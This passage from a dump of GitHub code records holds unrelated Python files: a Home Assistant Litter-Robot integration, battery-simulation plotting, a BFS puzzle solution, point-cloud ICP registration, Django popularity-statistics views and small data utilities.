name=DOMAIN,\n update_method=_async_update_data,\n update_interval=timedelta(seconds=UPDATE_INTERVAL),\n )\n\n async def login(self, load_robots: bool = False):\n \"\"\"Login to Litter-Robot.\"\"\"\n self.logged_in = False\n self.account = pylitterbot.Account()\n try:\n await self.account.connect(\n username=self._data[CONF_USERNAME],\n password=self._data[CONF_PASSWORD],\n load_robots=load_robots,\n )\n self.logged_in = True\n return self.logged_in\n except LitterRobotLoginException as ex:\n _LOGGER.error(\"Invalid credentials\")\n raise ex\n except LitterRobotException as ex:\n _LOGGER.error(\"Unable to connect to Litter-Robot API\")\n raise ex\n\n\nclass LitterRobotEntity(CoordinatorEntity):\n \"\"\"Generic Litter-Robot entity representing common data and methods.\"\"\"\n\n def __init__(self, robot: pylitterbot.Robot, entity_type: str, hub: LitterRobotHub):\n \"\"\"Pass coordinator to CoordinatorEntity.\"\"\"\n super().__init__(hub.coordinator)\n self.robot = robot\n self.entity_type = entity_type\n self.hub = hub\n\n @property\n def name(self):\n \"\"\"Return the name of this entity.\"\"\"\n return f\"{self.robot.name} {self.entity_type}\"\n\n @property\n def unique_id(self):\n \"\"\"Return a unique ID.\"\"\"\n return f\"{self.robot.serial}-{self.entity_type}\"\n\n @property\n def device_info(self):\n \"\"\"Return the device information for a Litter-Robot.\"\"\"\n return {\n \"identifiers\": {(DOMAIN, self.robot.serial)},\n \"name\": self.robot.name,\n \"manufacturer\": \"Litter-Robot\",\n \"model\": self.robot.model,\n }\n\n async def perform_action_and_refresh(self, action: MethodType, *args: Any):\n \"\"\"Perform an action and initiates a refresh of the robot data after a few seconds.\"\"\"\n\n async def async_call_later_callback(*_) -> None:\n await self.hub.coordinator.async_request_refresh()\n\n await action(*args)\n async_call_later(self.hass, REFRESH_WAIT_TIME, async_call_later_callback)\n\n @staticmethod\n def parse_time_at_default_timezone(time_str: str) -> Optional[time]:\n \"\"\"Parse a time string and add default timezone.\"\"\"\n parsed_time = dt_util.parse_time(time_str)\n\n if parsed_time is None:\n return None\n\n return time(\n hour=parsed_time.hour,\n minute=parsed_time.minute,\n second=parsed_time.second,\n tzinfo=dt_util.DEFAULT_TIME_ZONE,\n )\n","repo_name":"fpetillo/home-assistant","sub_path":"homeassistant/components/litterrobot/hub.py","file_name":"hub.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10430462931","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Mar 23 18:44:45 2017\r\n@author: Pablo\r\n\r\nObjetivos:\r\n-Lectura y representación de los archivos profiles.out y halfcells.out\r\n-La lectura debe ser capaz de leer los archivos sin importar su longitud\r\n\r\nGuía:\r\n-Ambos archivos deben encontrarse en la misma carpeta que este script\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n#Leemos todas las líneas del archivo\r\narchivo = open('profiles.out','r')\r\nlineas = archivo.readlines()\r\narchivo.close()\r\n\r\n#Calculamos el número de filas del archivo para cada tiempo\r\ni = 4 #Empieza a haber datos a partir de la línea 4\r\nnum_distancias = 0\r\n#Se aumenta el contador con cada línea distinta de cero de la primera matriz de\r\n#tiempos\r\nwhile lineas[i] != ' \\n':\r\n num_distancias += 1\r\n i += 1\r\n\r\n#Calculamos el número de tiempos del archivo\r\ndatos_halfcells = 
open('halfcells.out','r')\r\nlineas_halfcells = datos_halfcells.readlines()\r\ndatos_halfcells.close()\r\nnum_tiempos = len(lineas_halfcells)-1 #la primera linea no tiene datos\r\n\r\n#Declaramos los vectores que contendrán los valores de las columnas\r\ndistancia = np.zeros((num_tiempos,num_distancias)) #Cada columna tiene 101 filas\r\nC_Elec = np.zeros((num_tiempos,num_distancias))\r\nC_Sol_Surf = np.zeros((num_tiempos,num_distancias))\r\nLiq_Pot = np.zeros((num_tiempos,num_distancias))\r\nSolid_Pot = np.zeros((num_tiempos,num_distancias))\r\nJ_main = np.zeros((num_tiempos,num_distancias))\r\n\r\ntiempo = np.zeros(num_tiempos)\r\n\r\nV_neg = np.zeros(num_tiempos)\r\nV_pos = np.zeros(num_tiempos)\r\nHeat_gen = np.zeros(num_tiempos)\r\n\r\n\r\n#Datos profiles.in\r\n#Inicializamos para empezar el ciclo for\r\nfila =0\r\ncolumna = 0\r\n#Cada línea (fila) representa los datos para un tiempo concreto\r\nfor j in range(4,(num_distancias+6)*num_tiempos,num_distancias+6):\r\n for i in range(j,j+num_distancias): #Empieza a haber datos a partir de la línea 4\r\n #Cada elemento de \"lineas\" es un línea entera que convertimos en un vector\r\n linea = lineas[i].split(',')\r\n #A cada variable le vamos asignando su valor de cada línea que leemos\r\n distancia[fila,columna] = float(linea[0])\r\n C_Elec[fila,columna] = float(linea[1])\r\n C_Sol_Surf[fila,columna] = float(linea[2])\r\n Liq_Pot[fila,columna] = float(linea[3])\r\n Solid_Pot[fila,columna] = float(linea[4])\r\n J_main[fila,columna] = float(linea[5])\r\n columna = columna +1\r\n \r\n #Asignamos el tiempo de cada gráfica\r\n linea = lineas[j-1].split()\r\n tiempo[fila] = float(linea[2])\r\n \r\n #Al final del ciclo for pasamos a la siguiente fila y ponemos a cero las columnas\r\n fila = fila+1\r\n columna = 0\r\n \r\n#Datos halfcells.out\r\nfor i in range(1,num_tiempos+1):\r\n linea = lineas_halfcells[i].split()\r\n\r\n V_neg[i-1] = linea[1]\r\n V_pos[i-1] = linea[2]\r\n Heat_gen[i-1] = linea[5] \r\n \r\n#Representamos los resultados\r\ndef plot(numero):\r\n plt.figure(1)\r\n plt.plot(distancia[numero],C_Elec[numero],'o')\r\n plt.plot(distancia[0],C_Elec[0],'o')\r\n plt.ylabel('Concentración Electrolito')\r\n plt.title(tiempo[numero])\r\n plt.xlabel('Distancia')\r\n\r\n plt.figure(2)\r\n plt.plot(distancia[numero],C_Sol_Surf[numero],'o')\r\n plt.plot(distancia[0],C_Sol_Surf[0],'o')\r\n plt.ylabel('Concentración Sólido')\r\n plt.xlabel('Distancia')\r\n plt.title(tiempo[numero])\r\n\r\n plt.figure(3)\r\n plt.plot(distancia[numero],Liq_Pot[numero],'o')\r\n plt.plot(distancia[0],Liq_Pot[0],'o')\r\n plt.ylabel('Potencial en el líquido')\r\n plt.xlabel('Distancia')\r\n plt.title(tiempo[numero])\r\n\r\n plt.figure(4)\r\n plt.plot(distancia[numero],Solid_Pot[numero],'o')\r\n plt.plot(distancia[0],Solid_Pot[0],'o')\r\n plt.ylabel('Potencial en el sólido')\r\n plt.xlabel('Distancia')\r\n plt.title(('Tiempo =', tiempo[numero],' min'))\r\n \r\n plt.figure(5)\r\n plt.plot(tiempo,V_pos-V_neg)\r\n plt.ylabel('Voltaje celda (V)')\r\n plt.xlabel('Tiempo (s)')\r\n \r\n\"\"\"\r\n plt.figure(6)\r\n plt.plot(distancia[numero],J_main[numero],'o')\r\n plt.ylabel('J main')\r\n plt.xlabel('Distancia')\r\n\"\"\"\r\n#Representamos los resultados para el último tiempo\r\nplot(num_tiempos-1)\r\n","repo_name":"pablocscode/TFG-CAEBAT","sub_path":"representacion1.5.py","file_name":"representacion1.5.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31328408410","text":"# 
https://www.acmicpc.net/problem/7569\n\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\n\ndef bfs():\n while queue:\n x, y, z = queue.popleft()\n\n for i in range(6):\n nx = directions[i][0] + x\n ny = directions[i][1] + y\n nz = directions[i][2] + z\n\n if not 0 <= nx < H or not 0 <= ny < N or not 0 <= nz < M:\n continue\n\n if tomato[nx][ny][nz] == 0 and visited[nx][ny][nz] == False:\n queue.append((nx, ny, nz))\n tomato[nx][ny][nz] = tomato[x][y][z] + 1\n visited[nx][ny][nz] = True\n\n\nM, N, H = map(int, input().split())\ntomato = [[list(map(int, input().split())) for i in range(N)] for i in range(H)]\n\nqueue = deque()\ndirections = [[-1, 0, 0], [1, 0, 0], [0, -1, 0], [0, 1, 0], [0, 0, -1], [0, 0, 1]]\nvisited = [[[False] * M for i in range(N)] for i in range(H)]\nfor i in range(H):\n for j in range(N):\n for k in range(M):\n if tomato[i][j][k] == 1:\n queue.append((i, j, k))\n visited[i][j][k] = True\n\nbfs()\nanswer = 0\nfor i in tomato:\n for j in i:\n for k in j:\n if k == 0:\n print(-1)\n exit(0)\n answer = max(answer, max(j))\nprint(answer - 1)\n","repo_name":"kijen723/KraftonJungleAlgorithms","sub_path":"WEEK03/7569-토마토.py","file_name":"7569-토마토.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14929331817","text":"import os\nimport sys\nimport pandas as pd\n\ndef main():\n year = int(os.environ[\"POPULATION_YEAR\"])\n pop = pd.read_excel(sys.argv[1], sheet_name=\"Flat\")\n pop = pop[pop[\"Year\"] == year]\n colname_mapping = {\n \"MYE\": \"population\",\n \"Area_Code\": \"area_code\"\n }\n pop.rename(columns=colname_mapping, inplace=True)\n pop[[\"area_code\", \"population\"]].to_csv(sys.argv[-1], index=False)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"hamishgibbs/facebook_population_2020_2021","sub_path":"src/census_population/clean_ni_mye.py","file_name":"clean_ni_mye.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23712434594","text":"import argparse\nimport os\nfrom t4c.util.file_checks import DATA_DIR\n\"\"\"Parse command line options\"\"\"\n\n\ndef parse_cli():\n \"\"\"Parse command line options\"\"\"\n\n parser = argparse.ArgumentParser(description=\"Hotel Data Conversion: It converts and\"\n \" validate data from CSV file to JSON\"\n \"\\n\\n-> Default Input file: .data/hotels.csv\"\n \"\\n-> Default Output Json: .data/hotels.json\",\n formatter_class=argparse.RawDescriptionHelpFormatter)\n parser.add_argument(\"-s\", \"--source-file\", required=False,\n default=os.path.join(os.getcwd(), DATA_DIR, \"hotels.csv\"))\n\n parser.add_argument(\"-d\", \"--destination-file\", required=False,\n default=os.path.join(os.getcwd(), DATA_DIR, 'hotels.json'))\n\n parser.add_argument(\"--overwrite-destination-file\", required=False,\n default=True, choices=['True', 'False'])\n\n parser.add_argument(\"--sort-by-field\", required=False, default='None',\n help='The field in INPUT file that '\n 'you want to use to sort the OUTPUT file')\n\n parser.add_argument(\"--complex-url-validation\", required=False,\n default=False, choices=['True', 'False'],\n help='Default = False - '\n 'It uses additional logic to evaluate the URL passed\\n'\n 'WARNING - It slows down drastically script performance')\n\n return 
parser.parse_args()\n","repo_name":"zimaldone/t4c","sub_path":"t4c/util/args_parser.py","file_name":"args_parser.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1726147386","text":"\"\"\"\nUsage: \npython 3d_semantic_map.py --test_scene=Data_collection/first_floor --floor=1\n\npython 3d_semantic_map.py --test_scene=Data_collection/second_floor --floor=2\n\"\"\"\nimport numpy as np\nimport cv2\nimport argparse\nimport os\nimport open3d as o3d\nfrom PIL import Image\nimport time\nimport copy\nimport pandas as pd\nimport math\nfrom sklearn.neighbors import NearestNeighbors\nimport gc\n\ndef parse_config():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--test_scene\", default=\"first_floor\")\n parser.add_argument(\"--floor\", required=True)\n parser.add_argument(\"--use_open3d\", default=1)\n # parser.add_argument(\"--gt\", required=True)\n \n return parser.parse_args()\n\ndef draw_registration_result(source, target, transformation, paint_uniform_color=True):\n source_temp = copy.deepcopy(source)\n target_temp = copy.deepcopy(target)\n if paint_uniform_color:\n source_temp.paint_uniform_color([1, 0.706, 0])\n target_temp.paint_uniform_color([0, 0.651, 0.929])\n source_temp.transform(transformation)\n o3d.visualization.draw_geometries([source_temp, target_temp])\n\ndef preprocess_point_cloud(pcd, voxel_size):\n # print(\":: Downsample with a voxel size %.3f.\" % voxel_size)\n pcd_down = pcd.voxel_down_sample(voxel_size)\n\n radius_normal = voxel_size * 2\n # print(\":: Estimate normal with search radius %.3f.\" % radius_normal)\n pcd_down.estimate_normals(\n o3d.geometry.KDTreeSearchParamHybrid(radius=radius_normal, max_nn=30))\n\n radius_feature = voxel_size * 5\n # print(\":: Compute FPFH feature with search radius %.3f.\" % radius_feature)\n pcd_fpfh = o3d.pipelines.registration.compute_fpfh_feature(\n pcd_down,\n o3d.geometry.KDTreeSearchParamHybrid(radius=radius_feature, max_nn=100))\n return pcd_down, pcd_fpfh\n\ndef prepare_dataset(source, target, voxel_size):\n source_down, source_fpfh = preprocess_point_cloud(source, voxel_size)\n target_down, target_fpfh = preprocess_point_cloud(target, voxel_size)\n return source, target, source_down, target_down, source_fpfh, target_fpfh\n\ndef execute_global_registration(source_down, target_down, source_fpfh,\n target_fpfh, voxel_size):\n distance_threshold = voxel_size * 1.5\n # print(\":: RANSAC registration on downsampled point clouds.\")\n # print(\" Since the downsampling voxel size is %.3f,\" % voxel_size)\n # print(\" we use a liberal distance threshold %.3f.\" % distance_threshold)\n result = o3d.pipelines.registration.registration_ransac_based_on_feature_matching(\n source_down, target_down, source_fpfh, target_fpfh, True,\n distance_threshold,\n o3d.pipelines.registration.TransformationEstimationPointToPoint(False),\n 3, [\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnEdgeLength(\n 0.9),\n o3d.pipelines.registration.CorrespondenceCheckerBasedOnDistance(\n distance_threshold)\n ], o3d.pipelines.registration.RANSACConvergenceCriteria(100000, 0.999))\n return result\n\ndef execute_fast_global_registration(source_down, target_down, source_fpfh,\n target_fpfh, voxel_size):\n distance_threshold = voxel_size * 0.5\n # print(\":: Apply fast global registration with distance threshold %.3f\" \\\n # % distance_threshold)\n result = o3d.pipelines.registration.registration_fast_based_on_feature_matching(\n 
source_down, target_down, source_fpfh, target_fpfh,\n o3d.pipelines.registration.FastGlobalRegistrationOption(\n maximum_correspondence_distance=distance_threshold))\n return result\n\ndef depth_image_to_point_cloud(rgb_img, depth_img, intrinsic_mtx):\n rgb = cv2.imread(rgb_img)[:,:,[2,1,0]].reshape((-1,3))\n depth = cv2.imread(depth_img, 0)\n depth_scale = 1000.0\n fx, fy, cx, cy = intrinsic_mtx[0,0], intrinsic_mtx[1,1], intrinsic_mtx[0,2], intrinsic_mtx[1,2]\n\n x = np.zeros(depth.shape)\n y = np.zeros(depth.shape)\n z = depth / depth_scale\n for i in range(x.shape[1]):\n x[:,i] = i\n x = ((x - x.shape[1] / 2) * z) / fx\n for i in range(y.shape[0]):\n y[i,:] = i\n y = ((y - y.shape[0] / 2) * z) / fy\n \n x, y, z = x.reshape((-1,1)), y.reshape((-1,1)), z.reshape((-1,1))\n r, g, b = rgb[:,0].reshape((-1,1)), rgb[:,1].reshape((-1,1)), rgb[:,2].reshape((-1,1))\n points = np.concatenate((x, -y, -z), axis=1)\n colors = np.concatenate((r, g, b), axis=1) / 255.0\n \n pcd = o3d.geometry.PointCloud()\n pcd.points = o3d.utility.Vector3dVector(points)\n pcd.colors = o3d.utility.Vector3dVector(colors)\n return pcd\n\ndef local_icp_algorithm(pcd1, pcd2, trans_init, threshold):\n # print(\"Apply point-to-point ICP\")\n reg_p2p = o3d.pipelines.registration.registration_icp(\n pcd1, pcd2, threshold, trans_init,\n o3d.pipelines.registration.TransformationEstimationPointToPoint(),\n o3d.pipelines.registration.ICPConvergenceCriteria(max_iteration=100))\n # draw_registration_result(pcd1, pcd2, reg_p2p.transformation, paint_uniform_color=False)\n return reg_p2p.transformation\n\ndef best_fit_transform(source, target):\n '''\n Calculates the least-squares best-fit transform that maps corresponding points A to B in m spatial dimensions\n Input:\n A: Nxm numpy array of corresponding points\n B: Nxm numpy array of corresponding points\n Returns:\n T: (m+1)x(m+1) homogeneous transformation matrix that maps A on to B\n R: mxm rotation matrix\n t: mx1 translation vector\n '''\n\n assert source.shape == target.shape\n\n # get number of dimensions\n m = source.shape[1]\n\n # translate points to their centroids\n centroid_source = np.mean(source, axis=0)\n centroid_target = np.mean(target, axis=0)\n Source = source - centroid_source\n Target = target - centroid_target\n # print(Source.shape)\n\n # rotation matrix\n W = Target.T @ Source # mxN @ Nxm\n U, S, Vt = np.linalg.svd(W)\n R = U @ Vt\n # print(R.shape)\n\n # special reflection case\n if np.linalg.det(R) < 0:\n Vt[m-1,:] *= -1\n R = U @ Vt\n\n # translation\n t = centroid_target.T - R @ centroid_source.T\n\n # homogeneous transformation\n T = np.identity(m+1)\n T[:m, :m] = R\n T[:m, m] = t\n\n return T\n\ndef local_icp_algorithm_own(pcd1, pcd2, trans_init, threshold):\n # pass\n max_iterations = 100\n source = copy.deepcopy(pcd1)\n target = copy.deepcopy(pcd2)\n \n source = np.asarray(source.points)\n target = np.asarray(target.points)\n\n m = source.shape[1]\n\n source_temp = np.ones((m+1, source.shape[0]))\n target_temp = np.ones((m+1, target.shape[0]))\n \n source_temp[:m,:] = np.copy(source.T)\n target_temp[:m,:] = np.copy(target.T)\n \n source_temp = trans_init @ source_temp\n\n prev_error = 0\n \n for i in range(max_iterations):\n # find the nearest neighbours between the current source and destination points\n neigh = NearestNeighbors(n_neighbors=1, radius=threshold, algorithm='auto')\n neigh.fit(target_temp[:m,:].T)\n distances, indices = neigh.kneighbors(source_temp[:m,:].T)\n indices = indices.reshape(-1)\n distances = distances.reshape(-1)\n valid = 
distances < threshold\n source_temp = source_temp[:,valid]\n target_temp = target_temp[:,indices]\n target_temp = target_temp[:,valid]\n source = source[valid,:]\n # compute the transformation between the current source and nearest destination points\n T = best_fit_transform(source_temp[:m,:].T, target_temp[:m,:].T)\n\n # update the current source\n source_temp = T @ source_temp\n\n # check error\n mean_error = np.sum(distances) / distances.size\n # print(mean_error)\n if abs(prev_error - mean_error) < 0.0001:\n break\n prev_error = mean_error\n\n # calculcate final tranformation\n T = best_fit_transform(source, source_temp[:m,:].T)\n\n return T\n\ndef calculate_error_distance(line1, line2):\n p1, p2 = np.asarray(line1.points), np.asarray(line2.points)\n error_dst = ((p1[:,0] - p2[:,0])**2 + (p1[:,1] - p2[:,1])**2 + (p1[:,2] - p2[:,2])**2)**0.5\n return np.sum(error_dst)\n \ndef euler_from_quaternion(w, x, y, z):\n \"\"\"\n Convert a quaternion into euler angles (roll, pitch, yaw)\n roll is rotation around x in radians (counterclockwise)\n pitch is rotation around y in radians (counterclockwise)\n yaw is rotation around z in radians (counterclockwise)\n \"\"\"\n t0 = +2.0 * (w * x + y * z)\n t1 = +1.0 - 2.0 * (x * x + y * y)\n roll_x = math.atan2(t0, t1)\n \n t2 = +2.0 * (w * y - z * x)\n t2 = +1.0 if t2 > +1.0 else t2\n t2 = -1.0 if t2 < -1.0 else t2\n pitch_y = math.asin(t2)\n \n t3 = +2.0 * (w * z + x * y)\n t4 = +1.0 - 2.0 * (y * y + z * z)\n yaw_z = math.atan2(t3, t4)\n rz = np.array([[math.cos(yaw_z), -math.sin(yaw_z), 0.0],\n [math.sin(yaw_z), math.cos(yaw_z), 0.0],\n [0.0, 0.0, 1.0]])\n ry = np.array([[math.cos(pitch_y), 0.0, math.sin(pitch_y)],\n [0.0, 1.0, 0.0],\n [-math.sin(pitch_y), 0.0, math.cos(pitch_y)]])\n rx = np.array([[1.0, 0.0, 0.0],\n [0.0, math.cos(roll_x), -math.sin(roll_x)],\n [0.0, math.sin(roll_x), math.cos(roll_x)]])\n \n R = rz @ (ry @ rx)\n return R # in radians\n\n\ndef custom_voxel_down(pcd, voxel_size):\n points = np.asarray(pcd.points)\n colors = np.asarray(pcd.colors)\n min_bound = pcd.get_min_bound()\n max_bound = pcd.get_max_bound()\n points_mean_list = []\n colors_mode_list = []\n range_x = np.arange(min_bound[0].item(), max_bound[0].item()+voxel_size, voxel_size)\n range_y = np.arange(min_bound[1].item(), max_bound[1].item()+voxel_size, voxel_size)\n range_z = np.arange(min_bound[2].item(), max_bound[2].item()+voxel_size, voxel_size)\n x, y, z = points[:,0].reshape((-1,1)), points[:,1].reshape((-1,1)), points[:,2].reshape((-1,1))\n # valid_x = [((x >= i) & (x < i+voxel_size)).reshape(-1) for i in range_x]\n valid_x = [np.logical_and(x>=i, x= j) & (y < j+voxel_size)).reshape(-1) for j in range_y]\n valid_y = [np.logical_and(y>=j, y= k) & (z < k+voxel_size)).reshape(-1) for k in range_z]\n valid_z = [np.logical_and(z>=k, z{num_pcd-i-1}:')\n source = pcd_list[i]\n target = pcd_list[i+1]\n source, target, source_down, target_down, source_fpfh, target_fpfh = \\\n prepare_dataset(source, target, voxel_size)\n start = time.time()\n result_ransac = execute_global_registration(source_down, target_down,\n source_fpfh, target_fpfh,\n voxel_size)\n # print(\"Global registration took %.3f sec.\\n\" % (time.time() - start))\n # print(result_ransac.transformation)\n # draw_registration_result(source_down, target_down, result_ransac.transformation) \n if use_open3d:\n transformation = local_icp_algorithm(source_down, target_down, result_ransac.transformation, threshold)\n else:\n transformation = local_icp_algorithm_own(source_down, target_down, 
result_ransac.transformation, threshold)\n # draw_registration_result(source, target, transformation, paint_uniform_color=False)\n # print(result_ransac.transformation)\n trans_mtx_list.append(transformation)\n \n \n for i in range(len(trans_mtx_list)-2, -1, -1):\n trans_mtx_list[i] = trans_mtx_list[i+1] @ trans_mtx_list[i]\n \n for i in range(len(trans_mtx_list)):\n pcd_list[i].transform(trans_mtx_list[i])\n\n\n roof_threshold = 0.01 if args.floor == 1 else 0.001 \n for i in range(num_pcd):\n points = np.asarray(pcd_list[i].points)\n colors = np.asarray(pcd_list[i].colors)\n x, y, z = points[:,0].reshape((-1,1)), points[:,1].reshape((-1,1)), points[:,2].reshape((-1,1))\n r, g, b = colors[:,0].reshape((-1,1)), colors[:,1].reshape((-1,1)), colors[:,2].reshape((-1,1))\n # print(np.max(y))\n # y < 0.01 for 1st floor, y < 0.001 for 2nd floor \n valid = (y < roof_threshold).reshape(-1)\n x, y, z = x[valid], y[valid], z[valid]\n r, g, b = r[valid], g[valid], b[valid]\n points = np.concatenate((x,y,z), axis=1)\n colors = np.concatenate((r,g,b), axis=1)\n pcd_list[i].points = o3d.utility.Vector3dVector(points)\n pcd_list[i].colors = o3d.utility.Vector3dVector(colors)\n\n # pcd_total = o3d.geometry.PointCloud()\n for i in range(num_pcd):\n print(i)\n # pcd_total += pcd_list[i]\n pcd_list[i] = custom_voxel_down(pcd_list[i], 0.003)\n # pcd_total = custom_voxel_down(pcd_total, 0.002)\n # pcd_list.append(line_estimated)\n # pcd_list.append(line_gt)\n o3d.visualization.draw_geometries(pcd_list)\n # o3d.io.write_point_cloud(args.test_scene+'.pcd', sum(pcd_list))\n del pcd_list\n gc.collect()\n\n rgb_path = os.path.join(args.test_scene, 'other_pred')\n pcd_list = []\n for i in range(num_files,0,-1):\n pcd = depth_image_to_point_cloud(os.path.join(rgb_path, str(i)+'.png'),\n os.path.join(depth_path, str(i)+'.png'),\n intrinsic_mtx)\n pcd_list.append(pcd)\n\n for i in range(len(trans_mtx_list)):\n pcd_list[i].transform(trans_mtx_list[i])\n\n for i in range(num_pcd):\n points = np.asarray(pcd_list[i].points)\n colors = np.asarray(pcd_list[i].colors)\n x, y, z = points[:,0].reshape((-1,1)), points[:,1].reshape((-1,1)), points[:,2].reshape((-1,1))\n r, g, b = colors[:,0].reshape((-1,1)), colors[:,1].reshape((-1,1)), colors[:,2].reshape((-1,1))\n # print(np.max(y))\n # y < 0.01 for 1st floor, y < 0.001 for 2nd floor \n valid = (y < roof_threshold).reshape(-1)\n x, y, z = x[valid], y[valid], z[valid]\n r, g, b = r[valid], g[valid], b[valid]\n points = np.concatenate((x,y,z), axis=1)\n colors = np.concatenate((r,g,b), axis=1)\n pcd_list[i].points = o3d.utility.Vector3dVector(points)\n pcd_list[i].colors = o3d.utility.Vector3dVector(colors)\n for i in range(num_pcd):\n print(i)\n pcd_list[i] = custom_voxel_down(pcd_list[i], 0.003)\n o3d.visualization.draw_geometries(pcd_list)\n del pcd_list\n gc.collect()","repo_name":"gyes00205/NYCU_IS","sub_path":"HW2/3d_semantic_map.py","file_name":"3d_semantic_map.py","file_ext":"py","file_size_in_byte":16419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15973210526","text":"# 这道题是最简单的斐波那契数列\nclass Solution:\n def fib(self, n: int):\n if n == 0:\n return 0\n if n == 1:\n return 1\n p, q, s = 0, 1, 1\n for i in range(2, n+1):\n s = p + q\n p = q\n q = s\n return s\n\n\nres = 
Solution().fib(10)\nprint(res)","repo_name":"royal-dargon/Leetcode","sub_path":"py/dp/509.py","file_name":"509.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27791830347","text":"# Create your views here.\nfrom django.views.decorators.cache import cache_page\nfrom django.template import Context, loader\n\nfrom django.utils import simplejson\nfrom django.db import connection, transaction\nfrom django.http import Http404\n\nfrom collections import defaultdict\nimport json\nfrom datetime import datetime, date, timedelta\n\nfrom Apps.popCommon.database import popCommonDB\nfrom Apps.xrdPopularity.database import popDB\n\nimport logging\nimport time\nimport calendar\nimport string\n\nimport copy\n\nlogger = logging.getLogger(__name__)\n#---------------------------------------------------------------------\n# DATA COLLECTION VIEWS\n#---------------------------------------------------------------------\n\ndef getxrdMonitoringInTimeWindowJSON(pars):\n    data = popDB.xrdStatInTimeWindow(pars)\n    logger.info('got data')\n    jdata = json.dumps(data)\n    return jdata\n\n\ndef getxrdMonitoringInTimeWindowForMultiplePlotsJSON(parList):\n    # logger.info('in getxrdMonitoringInTimeWindowForMultiplePlotsJSON')\n    \n    allData = {'data' : [], \"tstop\": parList[0].TStop, \"tstart\": parList[0].TStart} \n    for pars in parList:\n        pars.orderby = 'order by xTime'\n        data = popDB.xrdStatInTimeWindow(pars) \n        points = [ (a['MILLISECONDSSINCEEPOCH'], float(a[pars.yval]) ) for a in data['DATA'] ]\n        allData['data'].append({'name': pars.name , 'data':points})\n\n    # logger.info(parList)\n    # logger.info(allData)\n    jdata = json.dumps(allData)\n    return jdata\n\n\n#---------------------------------------------------------------------\n\ndef getDSStatInTimeWindowJSON(params):\n    data = popDB.DSStatInTimeWindow(params)\n    jdata = json.dumps(data)\n    return jdata\n    \n#---------------------------------------------------------------------\n\ndef getUserStatInTimeWindowJSON(params):\n    translationDict = { 'totcpu' : 'TOTCPU', 'naccess' : 'NACC', 'nusers' : 'NUSERS'}\n    try:\n        params.orderVar = translationDict[params.orderVar]\n    except:\n        raise Paramvalidationexception('orderby', 'parameter not specified or not matching the options: %s' % translationDict.keys())\n\n    data = popDB.UserStatInTimeWindow(params)\n    if not hasattr(params, 'LocalVsGlobal'):\n        data['COLLNAME'] = params.collName\n        data['TSTART'] = params.TStart\n        data['TSTOP'] = params.TStop\n    jdata = simplejson.dumps(data)\n    return jdata\n\n\n#---------------------------------------------------------------------\n\ndef getMostPopStatDict(pars):\n    data = []\n    dataP = popDB.DSStatInTimeWindow(pars) \n    logger.info(dataP)\n    params = copy.deepcopy(pars)\n    for entry in dataP['DATA'][:params.FirstN]:\n        params.collName = entry['COLLNAME']\n        #collData = {\"COLLNAME\" : params.collName}\n        #collData.update(popDB.MostPopDSStat(params))\n        collData = popDB.MostPopDSStat(params)\n        data.append(collData)\n\n    # logger.info('getMostPopStatDict data %s' % data)\n    return data\n\n\n\n\ndef getTimeEvolutionPlotDataJSON(params):\n\n    translationDict = { 'totcpu' : 'TOTCPU', 'naccess' : 'NACC', 'nusers' : 'NUSERS'}\n    try:\n        params.orderVar = translationDict[params.orderVar]\n    except:\n        raise Paramvalidationexception('orderby', 'parameter not specified or not matching the options: %s' % translationDict.keys())\n    \n\n    data = getMostPopStatDict(params)\n    res = {'tstart': params.TStart, 'tstop': params.TStop, 
'aggr': params.AggrFlag, 'data': data}\n #logger.info('getTimeEvolutionPlotDataJSON data %s' % res)\n \n return json.dumps(res)\n\n\n\n#---------------------------------------------------------------------\n\n\ndef getSingleElementStat(par, MView):\n\n par.table = MView\n data = popDB.MostPopDSStat(par)\n logger.info(par)\n jsonRes = {}\n listRes = []\n series1 = []\n \"\"\"\n for entry in data['data']:\n millisecondSinceEpoch=1000*calendar.timegm(time.strptime(entry['TDAY'],'%Y/%m/%d'))\n if (par.orderVar == \"totcpu\"):\n series1.append( [ millisecondSinceEpoch, entry['TOTCPU'] ] )\n elif (par.orderVar == \"naccess\"):\n series1.append( [ millisecondSinceEpoch, entry['NACC' ] ] )\n elif (par.orderVar == \"nusers\"):\n series1.append( [ millisecondSinceEpoch, entry['NUSERS' ] ] )\n \"\"\"\n #listRes.append({'name' : data['COLLNAME'], 'data' : series1})\n #jsonRes = {'tstart': par.TStart, 'tstop': par.TStop, 'aggr': par.AggrFlag, 'data': listRes}\n jsonRes = {'tstart': par.TStart, 'tstop': par.TStop, 'aggr': par.AggrFlag, 'data': [data]}\n\n jdata = json.dumps(jsonRes)\n return jdata\n\n","repo_name":"dmwm/DDM","sub_path":"DataPopularity/popdb.web/lib/Apps/xrdPopularity/views/data_collection.py","file_name":"data_collection.py","file_ext":"py","file_size_in_byte":4546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"29779802221","text":"####################################读取数据集,画出最佳路径,保存为图片########################\n\nimport math, sys\nimport numpy as np\nimport scipy.interpolate as interpolate\nimport matplotlib.pyplot as plt\nimport os\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom scipy.misc import imread\nimport matplotlib.cbook as cbook\n \nclass cycdat:\n def __init__(self, vx, vy, wind, pres, data):\n self.x = vx\n self.y = 